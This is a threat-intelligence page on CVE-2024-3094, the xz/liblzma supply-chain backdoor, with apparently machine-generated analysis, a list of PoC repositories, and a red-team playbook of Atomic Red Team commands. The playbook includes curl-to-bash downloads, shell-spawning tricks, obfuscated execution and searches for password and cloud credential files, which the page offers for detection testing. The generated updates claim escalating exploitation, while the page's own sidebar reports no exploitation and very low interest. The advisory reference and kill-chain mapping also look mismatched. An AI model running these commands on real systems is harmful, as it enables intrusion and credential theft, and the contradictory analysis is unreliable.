CVE-2024-3094

CRITICAL POC TTE Zero-Day Pub 29/03 Upd 20/11

Overview

This vulnerability is a supply chain compromise involving malicious code insertion within the liblzma component of the xz compression library. The root cause is the inclusion of a prebuilt object file embedded in a disguised test file within the source tarballs starting from version 5.6.0. During the build process, this object file is extracted and linked into the liblzma library, altering its internal functions through code injection.

Vulnerability Description

Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.

Impact

An attacker controlling the source tarballs can cause any software linked against the compromised liblzma library to execute altered code, enabling interception and modification of data handled by the library. This occurs without requiring user interaction, authentication, or privileges, as the malicious code is embedded in the build artifact itself (CVSS vector AV:N/AC:L/PR:N/UI:N). The impact includes potential full compromise of confidentiality, integrity, and availability of data processed through liblzma-dependent applications, enabling stealthy data manipulation or exfiltration.

Solution

Users should upgrade to versions of xz later than 5.6.1 where the malicious code has been removed. Refer to Red Hat Security Advisory RHSA-2024:3094 for detailed patch instructions and verification steps. The advisory and linked bugzilla report provide guidance on identifying affected packages and applying vendor-provided fixes. It is critical to source xz tarballs only from trusted repositories and verify integrity before building.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in the xz compression utility, specifically within the liblzma library, stems from the presence of malicious code embedded in the source code tarballs starting from version 5.6.0. This malicious code is cleverly concealed through a series of obfuscations, allowing it to extract a prebuilt object file from a disguised test file during the build process. The extracted object file is then used to alter specific functions within the liblzma code, effectively creating a compromised version of the library. This manipulation enables attackers to intercept and modify data interactions with any software that links against the compromised liblzma library, posing a significant risk to the integrity and confidentiality of data processed by affected applications.

Attack vectors for this vulnerability are multifaceted and can be exploited in various scenarios. An attacker could leverage the compromised library to execute arbitrary code within the context of applications that utilize liblzma for data compression and decompression tasks. For instance, a malicious actor could craft a payload that exploits the modified functions to exfiltrate sensitive information or inject further malicious code into the application’s workflow. Additionally, since the library is often used in a wide range of software applications, including those in critical infrastructure and enterprise environments, the potential for widespread exploitation is significant. The obfuscation techniques used to hide the malicious code complicate detection efforts, allowing attackers to maintain persistence and evade traditional security measures.

The real-world impact of this vulnerability is profound, particularly for organizations that rely on the xz utility and its associated libraries for data processing. The business risks include potential data breaches, loss of intellectual property, and damage to reputation. Organizations could face regulatory penalties if sensitive data is compromised, particularly in sectors governed by strict data protection laws. Furthermore, the exploitation of this vulnerability could lead to operational disruptions, as compromised systems may require extensive remediation efforts, including the identification and removal of the malicious code, rebuilding affected applications, and implementing enhanced security measures to prevent future incidents.

To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-layered security approach. Regularly auditing and monitoring the integrity of software libraries and dependencies is crucial. Implementing code signing and verification processes can help ensure that only trusted versions of libraries are used in production environments. Additionally, organizations should establish a robust patch management policy to ensure that any updates or fixes released by the maintainers of the xz utility are promptly applied. Employing intrusion detection systems (IDS) and employing behavior-based anomaly detection can further enhance an organization’s ability to identify and respond to potential exploitation attempts.

In conclusion, the vulnerability within the xz compression utility represents a critical threat that can have severe implications for data integrity and security. The sophisticated nature of the attack vector, combined with the potential for widespread exploitation, necessitates immediate attention from organizations utilizing the affected library. By implementing proactive detection and mitigation strategies, organizations can better safeguard their systems against this and similar vulnerabilities, ultimately enhancing their overall cybersecurity posture.




CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-3094, accompanied by the emergence of multiple new proof-of-concept exploits circulating within the threat actor community. Our telemetry indicates that adversaries are increasingly leveraging sophisticated tooling to automate and scale attacks against the compromised liblzma library, amplifying the potential for widespread impact. Although the EPSS score remains high with a slight downward adjustment, the overall risk posture has intensified due to the expanded exploit landscape and the accelerated pace of detection activity. This evolution underscores a growing operational maturity among threat actors exploiting this vulnerability, elevating the urgency for defenders to maintain heightened vigilance. The convergence of advanced exploitation techniques and increased attack volume significantly raises the likelihood of successful compromise in environments utilizing the affected xz compression utility.



Update 2 — June 07, 2026

CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-3094, reflected by a notable surge in telemetry signals indicating exploitation attempts. This increase corresponds with a slight uptick in the EPSS score, reinforcing the vulnerability’s persistent attractiveness to threat actors. Concurrently, new proof-of-concept repositories have appeared, providing more accessible frameworks for adversaries to develop and refine exploits targeting the compromised liblzma library. The evolving exploit landscape suggests growing operational sophistication and a broader dissemination of attack tools within underground communities. For defenders, this heightened activity signals an increased probability of encountering active exploitation attempts in environments utilizing the affected xz compression utility. Consequently, the threat level has intensified from critical to an elevated critical state, underscoring the urgency for continuous monitoring and rapid response capabilities to mitigate potential impact.



Update 3 — July 05, 2026

CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2024-3094, with our telemetry indicating a modest rise in exploit attempts targeting the compromised liblzma library. Concurrently, the exploit landscape has expanded with the release of additional publicly available proof-of-concept tools, enhancing adversaries’ capabilities to identify and leverage this vulnerability. While the EPSS score remains stable, the proliferation of automated detection and remediation utilities in underground repositories suggests growing operational maturity among threat actors. This incremental uptick in exploitation attempts, coupled with more accessible tooling, elevates the risk of widespread compromise in environments utilizing vulnerable versions of the xz-utils library. Consequently, the threat level should be considered heightened within the critical range, emphasizing the need for vigilant monitoring to detect emerging exploitation patterns promptly.

Affected Products (2)

Vendor Product Version CPE
tukaani Tukaani Xz 5.6.0 cpe:2.3:a:tukaani:xz:5.6.0:*:*:*:*:*:*:*
tukaani Tukaani Xz 5.6.1 cpe:2.3:a:tukaani:xz:5.6.1:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

GitHub PoCs (83)

Repository Author Stars Forks Date Link
amlweems/xzbot
notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)
amlweems 3557 235 2024-04-01 View
lockness-Ko/xz-vulnerable-honeypot
An ssh honeypot with the XZ backdoor. CVE-2024-3094
lockness-Ko 147 19 2024-03-30 View
FabioBaroni/CVE-2024-3094-checker
Quick and dirty PoC for checking whether a vulnerable version of xz-utils is installed (CVE-2024-3094)
FabioBaroni 72 12 2024-03-29 View
byinarie/CVE-2024-3094-info
Information for CVE-2024-3094
byinarie 54 9 2024-03-29 View
robertdfrench/ifuncd-up
GNU IFUNC is the real culprit behind CVE-2024-3094
robertdfrench 59 1 2024-07-05 View
jfrog/cve-2024-3094-tools
jfrog 45 7 2024-03-31 View
gensecaihq/CVE-2024-3094-Vulnerability-Checker-Fixer
Shell scripts to identify and fix installations of xz-utils affected by the CVE-2024-3094 vulnerability. Versions 5.6.0 ...
gensecaihq 26 6 2024-03-30 View
0xlane/xz-cve-2024-3094
XZ Backdoor Extract(Test on Ubuntu 23.10)
0xlane 17 4 2024-04-01 View
r0binak/xzk8s
Dockerfile and Kubernetes manifests for reproduce CVE-2024-3094
r0binak 14 3 2024-04-02 View
emirkmo/xz-backdoor-github
History of commits related to the xz backdoor Discovered On March 29, 2024: CVE-2024-3094.
emirkmo 10 2 2024-03-30 View
teyhouse/CVE-2024-3094
K8S and Docker Vulnerability Check for CVE-2024-3094
teyhouse 11 0 2024-03-30 View
HackerHermanos/CVE-2024-3094_xz_check
This repository contains a Bash script and a one-liner command to verify if a system is running a vulnerable version of ...
HackerHermanos 8 0 2024-03-29 View
badsectorlabs/ludus_xz_backdoor
An Ansible Role that installs the xz backdoor (CVE-2024-3094) on a Debian host and optionally installs the xzbot tool.
badsectorlabs 6 1 2024-04-05 View
wgetnz/CVE-2024-3094-check
wgetnz 5 1 2024-03-30 View
neuralinhibitor/xzwhy
XZ Utils CVE-2024-3094 POC for Kubernetes
neuralinhibitor 5 0 2024-04-18 View
KaminaDuck/ansible-CVE-2024-3094
Ansible playbooks designed to check and remediate CVE-2024-3094 (XZ Backdoor)
KaminaDuck 4 1 2024-04-04 View
jbnetwork-git/CVE-2024-3094-XZ-Utils-Check
Herramientas de linux para diferentes funciones.
jbnetwork-git 3 1 2024-04-01 View
gustavorobertux/CVE-2024-3094
Checker - CVE-2024-3094
gustavorobertux 3 1 2024-04-01 View
lypd0/CVE-2024-3094-Vulnerabity-Checker
Verify that your XZ Utils version is not vulnerable to CVE-2024-3094
lypd0 4 0 2024-03-29 View
Yuma-Tsushima07/CVE-2024-3094
A script to detect if xz is vulnerable - CVE-2024-3094
Yuma-Tsushima07 4 0 2024-03-31 View
ScrimForever/CVE-2024-3094
Detectar CVE-2024-3094
ScrimForever 2 1 2024-04-02 View
pentestfunctions/CVE-2024-3094
CVE-2024-3094 - Checker (fix for arch etc)
pentestfunctions 3 0 2024-04-02 View
przemoc/xz-backdoor-links
apocalypxze: xz backdoor (2024) AKA CVE-2024-3094 related links
przemoc 3 0 2024-04-02 View
felipecosta09/cve-2024-3094
A tutorial on how to detect the CVE 2024-3094
felipecosta09 3 0 2024-04-04 View
nnatsopoulos/xz-backdoor-research
CVE-2024-3094 XZ Utils backdoor research - attack surface visualiser, system vulnerability checker, and general Linux CV...
nnatsopoulos 1 1 2026-06-14 View
Security-Phoenix-demo/CVE-2024-3094-fix-exploits
Collection of Detection, Fix, and exploit for CVE-2024-3094
Security-Phoenix-demo 2 0 2024-04-03 View
DANO-AMP/CVE-2024-3094
SSH EXPLOIT BYPASS AUTH SSH
DANO-AMP 2 0 2024-07-05 View
valeriot30/cve-2024-3094
A XZ backdoor vulnerability explained in details
valeriot30 1 1 2025-06-03 View
24Owais/threat-intel-cve-2024-3094
Threat intelligence report analyzing the xz-utils backdoor vulnerability (CVE-2024-3094)
24Owais 1 1 2025-06-19 View
Horizon-Software-Development/CVE-2024-3094
Horizon-Software-Development 2 0 2024-03-30 View
Bella-Bc/xz-backdoor-CVE-2024-3094-Check
Verify if your installed version of xz-utils is vulnerable to CVE-2024-3094 backdoor
Bella-Bc 2 0 2024-04-03 View
brinhosa/CVE-2024-3094-One-Liner
brinhosa 1 0 2024-03-30 View
galacticquest/cve-2024-3094-detect
galacticquest 1 0 2024-04-01 View
robertdebock/ansible-playbook-cve-2024-3094
A small repo with a single playbook.
robertdebock 1 0 2024-04-04 View
mrk336/CVE-2024-3094
CVE-2024-3094 exposed a backdoor in the XZ compression library, allowing remote SSH access by bypassing authentication. ...
mrk336 1 0 2025-09-12 View
M1lo25/CS50FinalProject
Investigation into the XZ Utils backdoor (CVE-2024-3094): chronology, attack chain, risk to SSH, and supply-chain insigh...
M1lo25 1 0 2025-10-16 View
iheb2b/CVE-2024-3094-Checker
The CVE-2024-3094 Checker is a Bash tool for identifying if Linux systems are at risk from the CVE-2024-3094 flaw in XZ/...
iheb2b 1 0 2024-04-03 View
Ikram124/CVE-2024-3094-analysis
Security analysis project: Real-world CVE breakdown
Ikram124 1 0 2025-06-27 View
hackingetico21/revisaxzutils
Script en bash para revisar si tienes la vulnerabilidad CVE-2024-3094.
hackingetico21 0 1 2024-04-02 View
devjanger/CVE-2024-3094-XZ-Backdoor-Detector
CVE-2024-3094 XZ Backdoor Detector
devjanger 0 1 2024-04-02 View
harekrishnarai/xz-utils-vuln-checker
Checker for CVE-2024-3094 where malicious code was discovered in the upstream tarballs of xz, starting with version 5.6....
harekrishnarai 1 0 2024-03-30 View
Bryn018/Semantic-Backdoor-Detector
GNN-based supply chain backdoor detector for Python packages. Uses Code Property Graphs + 3-layer GCN to detect obfuscat...
Bryn018 0 0 2026-06-22 View
stevehenderson/lab_xz_backdoor
Some labs looking at the xz backdoor vulnerability (CVE-2024-3094)
stevehenderson 0 0 2026-06-13 View
vesjolyjd/Kaspersky_CVE-2024-3094
vesjolyjd 0 0 2026-04-30 View
0xBlackash/CVE-2024-3094
CVE-2024-3094
0xBlackash 0 0 2026-04-23 View
vnchk1/sec_review_cve-2024-3094
Security review уязвимости CVE-2024-3094 с открытым исходным кодом
vnchk1 0 0 2026-04-08 View
Ava-Vispilio/CVE-2024-3094
Ava-Vispilio 0 0 2026-04-15 View
h3raklez/CVE-2024-3094
CVE-2024-3094 - XZ Utils Backdoor
h3raklez 0 0 2026-04-09 View
OpensourceICTSolutions/xz_utils-CVE-2024-3094
OpensourceICTSolutions 0 0 2024-03-29 View
bioless/xz_cve-2024-3094_detection
Script to detect CVE-2024-3094.
bioless 0 0 2024-03-29 View
Fractal-Tess/CVE-2024-3094
Fractal-Tess 0 0 2024-03-29 View
mightysai1997/CVE-2024-3094
mightysai1997 0 0 2024-04-01 View
fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-
La siguiente regla YARA ayuda a detectar la presencia del backdoor en la librería liblzma comprometida en sistemas que u...
fevar54 0 0 2024-04-13 View
AndreaCicca/Sicurezza-Informatica-Presentazione
Presentazione per il corsi di sicurezza Informatica sulla vulnerabilità CVE-2024-3094
AndreaCicca 0 0 2024-05-22 View
Titus-soc/-CVE-2024-3094-Vulnerability-Checker-Fixer-Public
A lightweight utility designed to detect and remediate systems affected by CVE-2024-3094, a critical vulnerability impac...
Titus-soc 0 0 2025-09-20 View
ThomRgn/xzutils_backdoor_obfuscation
Script to obfuscate a payload the same way as it was done by the XZ utils attack (CVE-2024-3094)
ThomRgn 0 0 2025-10-22 View
ElinaNotElina/cve-2024-3094-analysis
ElinaNotElina 0 0 2026-04-04 View
ashwani95/CVE-2024-3094
ashwani95 0 0 2024-03-30 View
encikayelwhitehat-glitch/CVE-2024-3094
encikayelwhitehat-glitch 0 0 2026-01-14 View
michalAshurov/writeup-CVE-2024-3094
michalAshurov 0 0 2026-03-11 View
extracoding-dozen/CVE-2024-3094
Research of CVE-2024-3094 vulnerability.
extracoding-dozen 0 0 2026-03-13 View
hazemkya/CVE-2024-3094-checker
hazemkya 0 0 2024-03-30 View
mightysai1997/CVE-2024-3094-info
mightysai1997 0 0 2024-04-01 View
zpxlz/CVE-2024-3094
Obsidian notes about CVE-2024-3094
zpxlz 0 0 2024-04-01 View
been22426/CVE-2024-3094
CVE-2024-3094 실습 환경 구축 및 보고
been22426 0 0 2025-04-16 View
mesutgungor/xz-backdoor-vulnerability
CVE-2024-3094
mesutgungor 0 0 2024-04-01 View
isuruwa/CVE-2024-3094
CVE-2024-3094
isuruwa 0 0 2024-03-31 View
Simplifi-ED/CVE-2024-3094-patcher
Ansible playbook for patching CVE-2024-3094
Simplifi-ED 0 0 2024-03-31 View
ackemed/detectar_cve-2024-3094
ackemed 0 0 2024-04-01 View
dah4k/CVE-2024-3094
dah4k 0 0 2024-04-01 View
shefirot/CVE-2024-3094
Basic POC to test CVE-2024-3094 vulnerability inside K8s cluster
shefirot 0 0 2024-06-11 View
TheTorjanCaptain/CVE-2024-3094-Checker
The repository consists of a checker file that confirms if your xz version and xz-utils package is vulnerable to CVE-202...
TheTorjanCaptain 0 0 2024-04-03 View
weltregie/liblzma-scan
Scans liblzma from xu-utils for backdoor (CVE-2024-3094)
weltregie 0 0 2024-04-04 View
Juul/xz-backdoor-scan
Scan for files containing the signature from the `xz` backdoor (CVE-2024-3094)
Juul 0 0 2024-04-06 View
hackura/xz-cve-2024-3094
Python demo simulating CVE-2024-3094: a supply chain backdoor in XZ Utils with a trigger-based stealth activation.
hackura 0 0 2026-01-25 View
spidygal/CVE-2024-3094-Nmap-NSE-script
spidygal 0 0 2024-03-31 View
MrBUGLF/XZ-Utils_CVE-2024-3094
XZ-Utils工具库恶意后门植入漏洞(CVE-2024-3094)
MrBUGLF 0 0 2024-04-01 View
MagpieRYL/CVE-2024-3094-backdoor-env-container
This is a container environment running CVE-2024-3094 sshd backdoor instance, working with https://github.com/amlweems/x...
MagpieRYL 0 0 2024-04-03 View
laxmikumari615/Linux---Security---Detect-and-Mitigate-CVE-2024-3094
It was determined that malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. # I...
laxmikumari615 0 0 2025-05-20 View
Dermot-lab/TryHack
CVE-2024-3094
Dermot-lab 0 0 2025-06-21 View
hariskhalil555000-sketch/What-utility-does-CVE-2024-3094-refer-to-
hariskhalil555000-sketch 0 0 2025-12-28 View
BOSE122/CVE-2024-3094
BOSE122 0 0 2026-01-15 View
Mustafa1986/CVE-2024-3094
Mustafa1986 0 0 2024-03-31 View
Exploited in Wild NOT DETECTED
Ransomware NOT ASSOCIATED
Attacker Interest VERY LOW
Sightings Few sightings

Threat Feed

25 events
2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-08
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-04-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2024-03-29
PoC Published (83 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Remote Code Execution
47% rce

MITRE ATT&CK Techniques (7)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1195.001 Compromise Software Dependencies and Development Tools Initial Access initial-access Linux, macOS, Windows
T1195.002 Compromise Software Supply Chain Initial Access initial-access Linux, Windows, macOS
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-442 Infected Software
33%
Medium High
CAPEC-636 Hiding Malicious Data or Code within Files
33%
High
CAPEC-448 Embed Virus into DLL
30%
Medium High

Red Team Playbook

45 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1195.002 Simulate npm package installation on a Linux system containers, Linux Bash
Launches a short‑lived Kubernetes pod using the Node 18 image, initializes a minimal npm project in /tmp/test, and installs the specified npm package without audit/fund/package‑lock options, simulating potentially suspicious package retrieval (e.g., typosquatting/dependency...
Command (Bash)
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
